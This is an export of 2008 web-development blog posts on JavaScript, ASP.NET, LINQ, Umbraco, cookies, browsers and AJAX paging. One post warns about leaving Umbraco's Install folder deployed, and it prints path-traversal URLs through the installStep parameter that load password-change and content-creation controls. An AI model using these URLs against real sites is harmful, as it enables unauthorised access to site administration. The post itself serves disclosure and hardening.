why?\nYou need to remember that JavaScript is an loosly typed language, you don't define a variable type, you define it by the the assignment. This also means you can retype a variable during its life. So what's the got to do with the equality operators? Well the choice of equality comparison depends how strongly checked you want to make your comparison.\nSay what? Well, == compares the values at a primitive level, regardless of their types, where as === also does a type comparison. Take the following example: var someValue = 1; alert(someValue == '1'); alert(someValue === '1'); Both alerts will show true, but in the first alert we're comparing a number to a string. That's likely to be a problem if you're comparing two variables! It's a good way to get unexpected behavior from your JavaScript.\nAs Ruben has correctly pointed out below the first alert shows true and the second shows false (note - don't blog while watching TV, you tend to not pay attention :P). Because we are comparing a number to a string we generally do not want it to be true. 
This is most commonly noticed when comparing two variables and can lead to unexpected behavior during script execution. So should you ever use an untyped equality comparison? Well, yes - if the type of what's being compared is either a) definitely known (ie - prechecked) or b) not going to have a bearing on the continued operation of the script. Well there's something to keep in mind the next time you think JavaScript is out to get you with unexpected operation. ", "id": "2008-10-25-when-equal-isnt-equal" }, { "title": "The difference between client and server", "url": "https://www.aaron-powell.com/posts/2008-10-06-the-difference-between-client-and-server/", "date": "Mon, 06 Oct 2008 00:00:00 +0000", "tags": [ "asp.net", "ajax" ], "description": "", "content": " Recently I've been doing a lot of AJAX work, I'm preparing a presentation on best practices. I've also been helping some people at work who have been working on a very AJAX-rich website. One thing I've found a lot over the years is that people seem to get confused about the difference between server and client and what can be done from one or the other.\nAnd for web developers, not understanding the difference can be a big issue. So I'm going to address some of the most commonly asked questions. Why doesn't my JavaScript execute?\nI can't count the number of times I've seen this code: Page.ClientScript.RegisterStartupScript(this.GetType(), \"js\", \"alert('hey!');\", true); Response.Redirect(\"/some-page.aspx\"); And had the developer ask \"Why doesn't my JavaScript execute?\". *sigh* This is an example of a developer not understanding the difference between client and server. Client code is not executed until every point of the server life cycle has completed, and then the client life cycle begins.\nThe client life cycle will vary depending on what (if any) JavaScript framework is being used. With ASP.NET the server life cycle is always the same, information on it can be found here. If you want to do a redirect after showing something in the client scope a window.location.href needs to be used. Something such as this is best: Page.ClientScript.RegisterStartupScript(this.GetType(), \"js\", \"alert('hey!'); setTimeout(function() { window.location.href='/some-page.aspx'; }, 2000);\", true); Why use a setTimeout? It means that the redirection is not automatic, so if you're showing something that won't pause page execution (ie, not an alert) then it'll show your client info before redirecting. Where do I put my client event handlers? This is a point of conjecture, where do you put your client event handlers? Do you register them server side by adding them to the Attributes collection, do you add them to the markup of the server control or do you use your JavaScript framework to register an event handler? I'm from the school of thought which states \"What happens on the client, stays on the client\". My preference: using your JavaScript framework. Why? Well I don't think that it can be expected that your UI developers, who are generally in charge of the JavaScript, need to dig around to find how all the client components come together.\nNow it's starting to make sense that JavaScript shouldn't be in the .NET code. But how do you find the ASP.NET server control ID? ASP.NET generates its IDs on the fly. $get('<%= myTextBox.ClientID %>'); Easy! Or are you a jQuery fan? $('#<%= myTextBox.ClientID %>'); Each framework has a different way in which events are attached, the Microsoft AJAX framework has its $addHandler, jQuery has .bind, etc. 
Which JavaScript framework library should I use? This is a massively subjective question; it really comes down to what you are familiar with and what you want to do. I'm a Microsoft AJAX and jQuery fan, especially since the past week's announcement that Microsoft will be supporting jQuery alongside their own framework (sweet!). I like the design pattern of Microsoft AJAX (which is built heavily on the prototype framework) but that comes back to being a .NET developer, I'm used to namespaces, classes and interfaces, all of which the MS framework brings in. But jQuery is fantastic for animation, has a great plugin library and an awesome set of selectors. That said, I've never played with mootools or the Yahoo! library, both of which I'm sure are great choices.   So hopefully these few common questions can be of reference or something you can point someone to next time they ask a question you can't be bothered answering. ", "id": "2008-10-06-the-difference-between-client-and-server" }, { "title": "Using LINQ to do email templates", "url": "https://www.aaron-powell.com/posts/2008-09-27-using-linq-to-do-email-templates/", "date": "Sat, 27 Sep 2008 00:00:00 +0000", "tags": [ "linq" ], "description": "", "content": " So recently I was working on a project where a client wanted to have customisable email templates which could be merged with data from their database, so we store the email as an XML document and have a series of placeholders within it to allow easy editing to customise the wording, layout, etc. But because there's quite a lot of different email \"data sources\" we wanted a nice and easy way so we didn't have to constantly write merge methods; having a single method which handles it all is the best idea.\nBut how do we handle all the different data sources? And since the ORM is LINQ to SQL it'd be really nice to not have to constantly write classes and structures to handle all the different formats. So this is what I came up with. Step 1, an XML document This isn't really that complex a step, I've got it really primitive and the XML was only storing the subject and body. But it can be as complex as required, storing SMTP details, sender, recipient(s), etc. I have just 2 nodes, a Subject and a Body node, the Body of the email being stored in a CDATA to make it easier to parse. Step 2, the Email Template class Now we need a class for the email template generation, this is what I have: public class EmailTemplate{ public string Subject { get; private set; } public string Body { get; private set; } public EmailTemplate(string path){ XDocument xdoc = XDocument.Load(path); var root = xdoc.Element(\"emailTemplate\"); this.Subject = root.Element(\"subject\").Value; this.Body = root.Element(\"body\").Value; } public string GenerateBody<T>(T data){ return Generate(this.Body, data); } public string GenerateSubject<T>(T data){ return Generate(this.Subject, data); } private static string Generate<T>(string source, T data){ // coming shortly } }   So now we have our class stubbed up; the constructor takes a path to an XML document and then we use an XDocument object to traverse into our XML and find the subject and body. The Subject and Body properties are made with private setters so that you can't edit them accidentally. Also, so that you can reuse the currently loaded template, the \"Generate\" methods return a string rather than replacing the contents of the current object. 
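For reference, the kind of document the constructor above is loading might look like this; the placeholder names are made up, and the {{ Property }} token format is what the next step works against.

```xml
<!-- Illustrative only: an emailTemplate root with subject and body nodes, the
     body wrapped in CDATA, using made-up {{ Property }} placeholders. -->
<emailTemplate>
  <subject>Your order, {{ CustomerName }}</subject>
  <body><![CDATA[
    <p>Hi {{ CustomerName }},</p>
    <p>We've received your {{ OrderCount }} orders and will be in touch shortly.</p>
  ]]></body>
</emailTemplate>
```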
Step 3, writing the Generator This is where the fun bit comes in, we're going to use Reflection to find all the properties of our generic type and then write its values into the source string. private static string Generate<T>(string source, T data){ Type theType = data.GetType(); PropertyInfo[] properties = theType.GetProperties(); string result = source; properties.ForEach(p => result = result.Replace(\"{{ \" + p.Name + \" }}\", p.GetValue(data, new Object[0]).ToString())); return result; }   So to sum up, I'm using Reflection to get all the properties from the object and then using the ForEach extension method (if you don't have the ForEach extension method check it out here). For each of the properties I create a token (which I'm using in the form of \"{{ MyProperty }}\") and then do a replace. I've found this template to be really effective as it allows for easy adding of new properties to my object without having to re-write the generation method, and it doesn't give a damn whether the property actually exists. I can quite easily use a LINQ to SQL expression like this: var myItems = ctx.MyDataItems.Select(m => new { Property1 = m.Property1, Property2 = m.Property2 }); And pass it straight in. Got to love anonymous types! ", "id": "2008-09-27-using-linq-to-do-email-templates" }, { "title": "LINQPad", "url": "https://www.aaron-powell.com/posts/2008-09-25-linqpad/", "date": "Thu, 25 Sep 2008 00:00:00 +0000", "tags": [ "linqpad" ], "description": "", "content": " I'm sure that a lot of people have played with LINQPad and if you haven't I strongly suggest you do. In short LINQPad is a C#, VB & SQL code snippet tester. A lot of people first started playing with LINQPad when it was initially released as it is a great tool to get started with LINQ to SQL; it allowed you to connect to a database and then start writing LINQ queries and view their execution along with their generated SQL. It's the best way to test queries as you don't need to do the standard \"create project, add DBML, write query and debug\". I've used it quite a lot since its release but never really got into what it can do. Today I started playing with it in a bit more depth and found that it is fantastically powerful!\nFirst off there's the \"Statement(s)\" mode, this is essentially a mini Visual Studio, here you can write your standard C# or your VB exactly as you would in VS and then execute it, dumping it out to the console. That's right, you can create objects, read/write properties, build collections, basically anything you could do with a standard console application! It also has the ability to import any DLL you want (well, effectiveness will vary, don't expect System.Web to be that useful!). This allows you to bring in your own extension methods, external ORMs, etc. I came across this video here: http://oreilly.com/pub/e/909 which is a webcast involving Joseph Albahari, the developer of LINQPad. It's long (42 minutes) but definitely worth a watch. ", "id": "2008-09-25-linqpad" }, { "title": "LINQ to XML to... Excel?", "url": "https://www.aaron-powell.com/posts/2008-09-16-linq-to-xml-to-excel/", "date": "Tue, 16 Sep 2008 00:00:00 +0000", "tags": [ "linq", "generic .net" ], "description": "", "content": " The other day one of the guys I work with was trying to work out the best way to generate an Excel document from .NET as the client had some weird requirements around how the numerical data needed to be formatted (4 decimal places, but Excel will only show 2 when opening a CSV). 
The next day my boss came across a link to a demo of how to use LINQ to XML to generate a XML file using the Excel schema sets which allow for direct opening in Excel.\nOne problem with the demo, it was using VB 9, and anyone who's seen VB 9 will know it has a really awesome way of handling XML literals in the IDE. This isn't a problem if you're coding in VB 9, but if you're in C# it can be. The VB 9 video can be found here: http://msdn.microsoft.com/en-us/vbasic/bb927708.aspx I recommend it be watched before progressing as it'll make a lot more sense against the following post. It'll also cover how to create the XML file, which I'm going to presume is already done. In the beginning Because C# doesn't have a nice way to handle XML literals like VB 9 does we're going to have to do a lot of manual coding of XML, additionally we need to ensure that the appropriate namespaces are used on the appropriate nodes. The Excel XML using 4 distinct namespaces, in 5 declarations (yes, I'll get to that shortly) so we'll start off by defining them like so: XNamespace mainNamespace = XNamespace.Get(\"urn:schemas-microsoft-com:office:spreadsheet\"); XNamespace o = XNamespace.Get(\"urn:schemas-microsoft-com:office:office\"); XNamespace x = XNamespace.Get(\"urn:schemas-microsoft-com:office:excel\"); XNamespace ss = XNamespace.Get(\"urn:schemas-microsoft-com:office:spreadsheet\"); XNamespace html = XNamespace.Get(\"http://www.w3.org/TR/REC-html40\"); Notice how the 'main namespace' and 'ss' are exactly the same, well this is how they are handled within the XML document. The primary namespace for the file is urn:schemas-microsoft-com:office:spreadsheet but in some locations it's also used as a prefix. For this demo I'm going to be using the obligatory Northwind database and I'm going to just have a simple query against the customers table like so: var dataToShow = from c in ctx.Customers select new { CustomerName = c.ContactName, OrderCount = c.Orders.Count(), Address = c.Address };   Now we have to start building our XML, the root element is named Workbook and then we have the following child groups: DocumentProperties ExcelWorkbook Styles Worksheet WorksheetOptions Each with variying child properties. First thing we need to do is set up our XElement and apply the namespaces, like so: XElement workbook = new XElement(mainNamespace + \"Workbook\", new XAttribute(XNamespace.Xmlns + \"html\", html), CreateNamespaceAtt(XName.Get(\"ss\", \"http://www.w3.org/2000/xmlns/\"), ss), CreateNamespaceAtt(XName.Get(\"o\", \"http://www.w3.org/2000/xmlns/\"),o), CreateNamespaceAtt(XName.Get(\"x\", \"http://www.w3.org/2000/xmlns/\"), x), CreateNamespaceAtt(mainNamespace), I'm using a helper method to create the namespace attribute (which you'll be able to find in the attached source), but notice how the \"main\" namespace is the last one we attach, if we don't do it this way we'll end up with the XElement detecting the same namespace and only adding it once. Also, you need to ensure that you're prefixing the right namespace to the XElement tag! DocumentProperties and ExcelWorkbook These two node groups are not overly complex, they hold the various meta-data about the Excel document we are creating, I'll skip them as they aren't really interesting and can easily be found in the source. Styles This section is really important and handy for configuring custom looks within the document. 
There are way to many options to configure here to cover in the demo, it's easiest to generate the styles in Excel and save the file as an XML document (or read the XSD if you really want!). If you're doing custom styles make sure you note the ID you give the style so you can use it later in your document. Also, these styles are workbook wide, not worksheet so you can reuse them on each worksheet you create. I have a very simple bold header. Generating a Worksheet Here is where the fun starts, we need to generate our worksheet. There are 4 bits of data we need to output here: Number of columns Number of Rows Header Data Rows To illistrate the power of LINQ I've actually dynamically generated the header row: var headerRow = from p in dataToShow.ToList().GetType().GetProperties() select new XElement(mainNamespace + \"Cell\", new XElement(mainNamespace + \"Data\", new XAttribute(ss + \"Type\", \"String\"), p.Name ) ); This is just a little bit of fun using LINQ and Reflection to dynamically generate the column headers ;) Next we need to output the number of columns and number of rows (keep in mind the rows is the data count + header row count): new XAttribute(ss + \"ExpandedColumnCount\", headerRow.Count()), new XAttribute(ss + \"ExpandedRowCount\", dataToShow.Count() + 1), Now we put out the header cells: new XElement(mainNamespace + \"Row\", new XAttribute(ss + \"StyleID\", \"Header\"), headerRow ), Then lastly we generate the data cells (note - this can be done like the header, just chose to do it differently to illustrate that it can be done several ways): (yes I used an image this time, the formatting is a real bitch in the Umbraco WYSIWYG editor!). Lastly there needs to be a WorksheetOptions node, and then you can combine all the XElements together, add it to an XDocument object and save! There you have it, how to create an Excel document using LINQ to XML and C#. Source code can be found here. ", "id": "2008-09-16-linq-to-xml-to-excel" }, { "title": "Did you forget something in your Umbraco site?", "url": "https://www.aaron-powell.com/posts/2008-09-15-did-you-forget-something-in-your-umbraco-site/", "date": "Mon, 15 Sep 2008 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": " When deploying Umbraco into a new environment (a UAT, a production, etc) everyone has a check list that the tick off against. This will cover items like: Modifying the web.config to use the right connection string/ smtp/ etc Setting the permissions on the file system Remove the Install folder And so on  Remove the Install folder, huh? To be honest this is a step I often forget, the Install folder tends to float around like a bad smell simply cuz no one has gotten around to removing it, but it can't be that bad... can it? Well yes, yes it can. First off, anyone clued in enough can get to your site and then go to /install/Default.aspx and run through the installer! Yeah, I'm sure you want that done...\nOr if you've got a really mallicious person they can start playing around with the installStep query string parameter. The installStep query string parameter has this really nice feature, you provide it the path to an ASCX so it can load that into the installer. The idea is so you can quickly jump to the appropriate step, the down side is it allows you to jump to any ASCX on the site.\nJust for fun try this on your site:\n/install/Default.aspx?installStep=../../umbraco/controls/passwordChange Well that just aint right now is it... 
So I decided to see what else you can do, well for starters you've got:\n/install/Default.aspx?installStep=../../umbraco/create/content See where I'm going with this, yep, you can bring up the create content window! Now we're getting dangerous.\nIf you've been like a lot of lazy dev's and not set up a 500-error page you'll see a lovely yellow error with a stack trace showing you just why the parse failed, looks like we missed a query string parameter.\nAnyone with access to the Umbraco source code (it's open source, so that's like... everyone) can then work out what went wrong, turns out we need a query strong nodeId, so lets try again:\n/install/Default.aspx?installStep=../../umbraco/create/content&nodeId=<some node id> Well what do you know, I can create a page... Obviously a random hacker will be slowed down by the fact that you need to actually know a node ID, but that's not hard to work out, trial and error will get you there eventually. I tried this on a handful of Umbraco sites I know of (including some very high profile companies sites) and found this working on all but 1 of them.   Moral of the story? Delete the bloody Install folder before going live! ", "id": "2008-09-15-did-you-forget-something-in-your-umbraco-site" }, { "title": "Not so tasty cookies", "url": "https://www.aaron-powell.com/posts/2008-09-11-not-so-tasty-cookies/", "date": "Thu, 11 Sep 2008 00:00:00 +0000", "tags": [ "asp.net", "generic .net", "rant" ], "description": "", "content": " As a general rule I'll avoid web cookies, they've got a bad wrap, and are too often used and abused. But for storing long life information on a client there's not really anything better. So recently I was putting them into a site which would check when you first hit it if the cookie exists, if it didn't then create it. Having not used cookies for a while I'd lost touch with how they operate, especially in the ASP.NET collection. Since HttpCookieCollection is a named collection you'd think that you could just got: HttpCookie myCookie = Response.Cookies[\"myCookie\"]; Well you can... sort of, I'll get to the sort of shortly, but some background.\nEvery time I did this I ended up with a cookie, regardless of whether one already existed or not. If it didn't exist then it'd have an expiry equal to DateTime.MinDate. Fine, what ever, I can detect that, so I had a handler to check that condition as well as a null return in myCookie. Then I have the following lines: HttpCookie myRealCookie = new HttpCookie(\"myCookie\");\nmyRealCookie.Value = \"something\";\nmyRealCookie.Expiry = DateTime.Now.AddDays(1);\nResponse.Cookies.Add(myRealCookie); But when I hit the control that is to use the cookie I get back the first \"dud\" cookie. WTF?\nSo I look at the HttpCookieCollection, low-and-behold I have 2 cookies named \"myCookie\". And when I try and get one out I always get the dud cookie.\nWTF! So I fire up Reflector and look squarly at what happens and this is what I found: public HttpCookie this[string name]{ get { return this.Get(name); } }public HttpCookie Get(string name){ HttpCookie cookie = (HttpCookie) base.BaseGet(name); if ((cookie == null) && (this._response != null)) { cookie = new HttpCookie(name); this.AddCookie(cookie, true); this._response.OnCookieAdd(cookie); } return cookie; }\tOh you have to be kidding me. You'd think that when I try and get a cookie that may not exist it doesn't just add the frigging thing! 
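The shape of the workaround is a guarded lookup instead of trusting the indexer - something along these lines (a sketch, not the exact code from the site):

```csharp
// A sketch: walk the collection and only return a cookie whose name actually
// matches, so nothing gets silently added to the response behind your back.
using System;
using System.Web;

public static class CookieHelper
{
    public static HttpCookie FindCookie(HttpCookieCollection cookies, string name)
    {
        for (int i = 0; i < cookies.Count; i++)
        {
            if (string.Equals(cookies[i].Name, name, StringComparison.OrdinalIgnoreCase))
            {
                return cookies[i];
            }
        }

        return null; // genuinely not there
    }
}
```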
So then I had to implement a lovely work around to itterate through the collection, check them by their index.\nHello performance! Yes, this is just another lovely example of the .NET framework thinking we're too dumb to handle coding ourselves. ", "id": "2008-09-11-not-so-tasty-cookies" }, { "title": "The SharePoint community is in morning", "url": "https://www.aaron-powell.com/posts/2009-09-05-the-sharepoint-community-is-in-morning/", "date": "Fri, 05 Sep 2008 00:00:00 +0000", "tags": [ "sharepoint" ], "description": "", "content": " So I've just sat down to read over the pilling up blogs from the last few days when I came across this one from Karine Bosch. Patrick Tisseghem passed away earlier today. Anyone who's not familiar with his name will most likely be familiar with his work through U2U, blogs, articles, books and training courses. I was lucky enough to have met Patrick last year at a 5 day SharePoint training session, it was a good great course, despite the disaster with the training material not arriving nor the books being available at the time. I have a copy of his first MOSS 2007 book, Inside Microsoft Office SharePoint Server 2007 and his second book Inside the Index and Search Engines: Microsoft Office SharePoint Server 2007, sounds interesting as I find the search engine in SharePoint such a pain to get my head around. His sudden death is a tragic loss to the SharePoint community and I wish the best for his family and friends in this troubled times. Farewell Patrick, I'm glad to have had the chance to meet you. ", "id": "2009-09-05-the-sharepoint-community-is-in-morning" }, { "title": "Does the world need another browser?", "url": "https://www.aaron-powell.com/posts/2008-09-03-does-the-world-need-another-browser/", "date": "Wed, 03 Sep 2008 00:00:00 +0000", "tags": [ "chrome" ], "description": "", "content": " So today Google released their foray into the web browser market with Google Chrome and I'm sitting here wondering does the world really need another browser? Lets look at the big players in the browser market: Internet Explorer Mozilla FireFox Apple's Safari Opera\nThen there's piles of smaller market share browsers (which argueably Opera and Safari fall into the category of). Each browser offers its own pros and cons. IE has the largest market share dispite some poor showing in the past. IE 6 is one of the worst things that happened to the web in recent years. But IE 7 isn't a bad browser, it's my primary browser in Windows, mainly because it has brought in the features from other browsers and it is very fast under Windows.\nIE 8 is shaping up to be a very nice contender, with Beta 2 recently coming available there's some very nice features, tab crash recovery, address bar highlighting, etc. There's lot of other blogs covering its features. FireFox has the enthusiest market down pat, with it being the number 1 Open Source choice. FireFox is great with its add-in engine, giving people the ability to customise it to their liking.\nAnd then there's FireBug argueably the number one inovation in the world of web development. I'm hard pressed to find a day which I don't use FireBug. But FireFox isn't without its critics, I for one am not a huge fan of it. I find it a real pain in the arse that every time I set up a new computer I have to go out and reconfigure FireFox for my personal settings, then there's the argument of memory usage. Safari is Apple's IE, it hasn't had quite as ugly a past, but it is far from perfect. 
Like IE in Windows Safari is super fast under OS X thanks to Apple pre-caching the browser.\nMy biggest grip about Safari under OS X is how tied to the browser is to it. I can only use Safari 3 under OS X 10.5, I can't use any previous version, and thanks to Apple's license dispute with VM's it makes it very hard to test multiple versions. Something really useful as a web developer! Last of the larger players is Opera, the browser for all devices, from mobile to Wii. I'm a big fan of Opera, I've used it for a very long time (since around v5) and I've always found it innovative in the market. From mouse gestures to a download manager to in-built torrent engine.\nBut it's not without issues, it's quite common to find problems with a site (eg, the Umbraco editor UI doesn't work with it), most commonly to do with how JavaScript is handled. So where does all of this leave Chrome? One of the most interesting things about the first release of Chrome is the fact that it's a Windows-only release. Interesting because it uses WebKit as it's base, which is what Safari is built off, and a fork of KHTML (and related KDE projects), so it's base is cross-platform by nature.\nMost people aren't going to give a shit about this app, it's more the techy market that's going to have a look, have a play and decide if they will be back, so why ignore a large portion by only releasing to Windows? I'll admit to not having had a huge play with it but I did install it, have a bit of a browse with it and then had to get back to the daily grind.\nAnd it left me going \"yeah so what?\". People are saying that it's blindingly fast, but I didn't notice any speed differences between it, IE 7 and FF 3.x on Vista x32. One of the big marketing points is that each tab runs in its own process. Now this is nice and does mean that if one crashes you don't loose it all. IE 8 also has this, but without running separate processes.\nI'm a little weary on each being in their own process. I'll often have a lot of tabs opened, each with their own process, so there's a lot more processes fighting for CPU time. Sure not really a problem in a multi-core environment but I've often got a lot going on on my CPU already (compilation, file copy, SQL server, web server, etc) so more fighting is always something to be weary of. Also, I didn't really see any feature to grab my attention. The address bar doubles as a search, but what browser does it not?! Can I change search provider though, now that's an interesting question (and one I'll have to look into!)? The new tab window looks a lot like Speed Dial in Opera 9, the UI is very WebKit/ Safari in its look and there's the obligatory FireBug clone. So does the world need another browser? In my opinion Chrome brings nothing we haven't seen before to the table, it looks a lot like a \"me too!\" release. I already have IE to address my large company pushed browser, FireFox for my obsessive need to tweak and Opera for my daily useage.\nChrome is just another anoyance, another chance for people to find start a fan club over, and another bloody browser to test against. 
", "id": "2008-09-03-does-the-world-need-another-browser" }, { "title": "Umbraco Membership Trap", "url": "https://www.aaron-powell.com/posts/2008-09-02-umbraco-membership-trap/", "date": "Tue, 02 Sep 2008 00:00:00 +0000", "tags": [ "umbraco", "asp.net" ], "description": "", "content": " So today I was working to fix a problem on a site of ours which was to do with logging out of a site which uses the Umbraco Membership as the authentication provider.\nThe bug was that when you had to click the logout button twice to log out. Clicking logout once would just refresh the page with nothing apparently happening. Firing up the debugger I start have a look, making sure that the events are being fired when they should and so on... and they are. The logout method is called, the member is removed from the cache, the \"show login\" method is called, but if you check through the Umbraco API you're not logged out. Member.CurrentMemberId() still returned a value. Hmm... so I'm doing everything that I need to do, so why is the member still logged in?\nI pull our .NET Reflector and start having a poke around the API calls. For those who don't know, by default Umbraco stores the member login details in cookies, and that was running fine, but what I found interesting was that when I call the Member.ClearMemberFromClient method the cookies still existed! That's not right... so I check out what's happening, when I notice the problem: Do you see it? If not I'll point out the problem. The cookie is not removed from the HttpContext, it is mearly set to expire immidiately. Well, at least once the context has disposed. So the only way we can get around this is to redirect after clearing the member from the client cache. ", "id": "2008-09-02-umbraco-membership-trap" }, { "title": "Optimising UpdatePanels", "url": "https://www.aaron-powell.com/posts/2008-08-28-optimising-updatepanels/", "date": "Thu, 28 Aug 2008 00:00:00 +0000", "tags": [ "asp.net", "ajax" ], "description": "", "content": " So it can be generally agreed that UpdatePanels are evil. Plenty of people have blogged about this, there's a good post here which goes over it in more details. To give a brief background the reason they are not a great idea is because of what they are, just a wrapper for the standard PostBack request to force it via XHttp rather than normal. This results in more data being submitted and returned than is really needed, so on big pages, or big requests this can negate the point of using AJAX as you're still submitting a lot of data. But there are instances where an UpdatePanel can be a viable choice, these are generally based around paged data. I came across this the other day when taking an implemented ListView control and wanting to make it paged and AJAX-y. So an UpdatePanel was in order. Lets have a look at a basic implementation of an UpdatePanel for a paged solution. The back end First off we're going to need a data source to display in our UpdatePanel. I've created a simple collection of people: I'm going to be implementing this in an ASP.NET ListView control, which will be paged. So here's the ASPX: And we're going to get the resulting page like this: Inspecting the response So lets look at what we're transfering back and forth on the server. I'll be using the FireBug plugin for FireFox to look at the request/ response but Http Fiddler would work just as well if you're an IE person. First we hit the page (Click for larger version) That's not exactly what we want to see. 
Sure it's not a big amount but 62kb is a lot to have received for such a small page. Now lets go to the next page of the data and get the UpdatePanel to do some work. Again, that's not exactly appealing, 4kb just to get another 5 rows!? It's also worrying when we look at the time taken Ouch, 2 seconds is a long time for such a small amount of data... But why is this happening? Well lets inspect the response with FireBug (Click for larger version) Now it starts to make sense, we're get a large, well formatted code block back. Now I am a huge fan of formatting documents. There's nothing worse that looking at a big code slab, I'm forever hitting Ctrl + K + Ctrl + D to reformat my document, but in this case it's having a very negative effect on our pages performance. Optimising the requests So now we've seen our simple little demo in action, the submit is a little heavy, even for what you'd like on an UpdatePanel, is there anything we can do about it? Well there's several things we can do, as you may notice from the screen shot we are submitting and receiving the ViewState each time. This is the major problem with an UpdatePanel, especially on complex pages. So the first thing is to turn off ViewState on anything you don't need it on. Eg - Label controls, the overhead of submitting their ViewState is higher than that of repopulating the attributes during a postback (and if you're properly AJAX-ing the page, you may not even need to do that as the PostBack isn't ever done!). But what else? Well, looking at the response there is a lot, and I mean a lot of whitespace, this adds considerable weight during submits. So what if we were to remove it? Say I changed my ASPX to look like this Sure, it's not overly readable, but how does it perform on the inital page load Hmm... down 1kb! How about the UpdatePanel request? Down a few more kb, but was it faster? Yes it was. Keep in mind that the time is a little subjective as I'm running this on my laptop so it can have performance fluctations, but none the less you should notice a decrease in the request time. And what does our response look like? (Click for larger version) Hmm... not really readable, but are we after readability... Conclusion So my example may be some-what sanitised, we don't really have a complex page, there not much in the way of other controls bar the UpdatePanel so the ViewState isn't really coming into effect in request weight. But this should give you an idea on if an UpdatePanel is the option you're going with then here is a few tricks to make it a bit less unpleasent. But that's not all, shortly we'll look at achieving this without the need to an UpdatePanel, or even ASP.NET controls! ", "id": "2008-08-28-optimising-updatepanels" }, { "title": "Paging data client side", "url": "https://www.aaron-powell.com/posts/2008-08-28-paging-data-client-side/", "date": "Thu, 28 Aug 2008 00:00:00 +0000", "tags": [ "ajax" ], "description": "", "content": " So in my last post I looked at how to use an UpdatePanel to do data paging and then optimising the HTML to get the best performance from our requests, but it still wasn't optimal. Although we can optimise the UpdatePanel response we can't do much about the request, and especially with regards to the ViewState within a page, which is the real killer.\nThis is when we turn to doing client-side paging using client-side templates. 
But what else? Well, looking at the response there is a lot, and I mean a lot, of whitespace, and this adds considerable weight during submits. So what if we were to remove it? Say I changed my ASPX to look like this. Sure, it's not overly readable, but how does it perform on the initial page load? Hmm... down 1kb! How about the UpdatePanel request? Down a few more kb, but was it faster? Yes it was. Keep in mind that the time is a little subjective as I'm running this on my laptop so it can have performance fluctuations, but nonetheless you should notice a decrease in the request time. And what does our response look like? Hmm... not really readable, but are we after readability? Conclusion So my example may be somewhat sanitised; we don't really have a complex page, and there's not much in the way of other controls bar the UpdatePanel, so the ViewState isn't really coming into effect in request weight. But this should give you an idea: if an UpdatePanel is the option you're going with, then here are a few tricks to make it a bit less unpleasant. But that's not all, shortly we'll look at achieving this without the need for an UpdatePanel, or even ASP.NET controls! ", "id": "2008-08-28-optimising-updatepanels" }, { "title": "Paging data client side", "url": "https://www.aaron-powell.com/posts/2008-08-28-paging-data-client-side/", "date": "Thu, 28 Aug 2008 00:00:00 +0000", "tags": [ "ajax" ], "description": "", "content": " So in my last post I looked at how to use an UpdatePanel to do data paging and then optimise the HTML to get the best performance from our requests, but it still wasn't optimal. Although we can optimise the UpdatePanel response we can't do much about the request, especially with regards to the ViewState within a page, which is the real killer.\nThis is when we turn to doing client-side paging using client-side templates. 
This concept is basically the same as what we're familiar with for the ListView and Repeater ASP.NET controls, but they operate entirely in JavaScript using JSON object collections. There are plenty of ways to go about client-side templating: you can write your own templating engine, it's not hard, I had a crack at it and wrote a client-side repeater which consumed data from a webservice in only a few hours.\nOr you can use any of the premade template engines. I'm a fan of the jQuery plugin jTemplates, or you can use the templating engine which is part of Preview 1 of the Microsoft AJAX 4.0 library. Let's have a look at both. Setting up the WebService Well, the first thing we need is to be able to get the data, so we'll create some webservices and set them up for JSON transmission of the data. You'll notice there are two services, one for returning the People collection in a paged format, thanks to some lovely LINQ extensions, and one to get the total number in the collection (which we'll look at later).
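The service code from the original post isn't reproduced in this archive, but the shape of it is roughly the following sketch; the Person type, the GetPeople name and the in-memory data source are assumptions, while GetPeopleCount and the Skip/Take paging are what the post describes.

using System.Collections.Generic;
using System.Linq;
using System.Web.Script.Services;
using System.Web.Services;

// A hypothetical ASMX service shaped like the one described above; [ScriptService]
// is what lets the jQuery calls get JSON back rather than XML.
[ScriptService]
public class PeopleService : WebService
{
    [WebMethod]
    public List<Person> GetPeople(int page, int pageSize)
    {
        // Skip/Take are the \"lovely LINQ extensions\" doing the paging
        return People().Skip(page * pageSize).Take(pageSize).ToList();
    }

    [WebMethod]
    public int GetPeopleCount()
    {
        return People().Count();
    }

    private static IEnumerable<Person> People()
    {
        // Stand-in for the demo's simple collection of people
        return Enumerable.Range(1, 50).Select(i => new Person { Id = i, Name = \"Person \" + i });
    }
}

public class Person
{
    public int Id { get; set; }
    public string Name { get; set; }
}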
Using jTemplates Now we need to set up our client-side template. jTemplates has its own expression format which is very similar to using an ASP.NET repeater, and it has lots of really nice inbuilt features for executing further functions while the template is being executed. I'm only going to be using the very basic features of jTemplates. Here's the template I've created for the example. So there's our template; now we need to implement it. We'll use jQuery to do our AJAX requests on the initial page load, and then all subsequent requests. I've got a few global variables which will be used in various locations within the JavaScript to maintain our page position. The getPeople method will handle the AJAX request, and then I have a separate load method in the form of loadPeople. getPeople will be used whenever we want to refresh the page's data. When doing the AJAX request we need to pass in the parameters the webservice requires. It's best to check out the jQuery documentation for how the various properties on the $.ajax function operate.\nloadPeople is where we actually create the client template instance and load the data into it. Yes, it's that simple to create a client template. Because the result is in JSON we don't need to worry about any kind of conversion. Now that we have the client template displaying the data, we need to work on the paging. First we need to know how many pages to make, so it's time to use the GetPeopleCount webservice. The loadPaging method is used to output our result, and then the paging itself is set up. I've also got a few methods which are then used for the next and previous buttons. Just to make it a bit cleaner I'm also disabling the buttons when they are not required. Well, now that this is all set up, how does it perform? Well, I'll just let the pictures do the talking. I'm sure you can deduce from the above that it was much more efficient. We've got a much smaller page load, and then the request is only a fraction of what the UpdatePanel one is! And we don't have the problem of submitting the ViewState either! Microsoft AJAX 4.0 Preview 1 So I'll just look at this briefly; first off we need to define our template. I really like this template engine compared to jTemplates, it's much simpler (but evidently less powerful) to implement, and there's no really weird syntax needing to be remembered. 
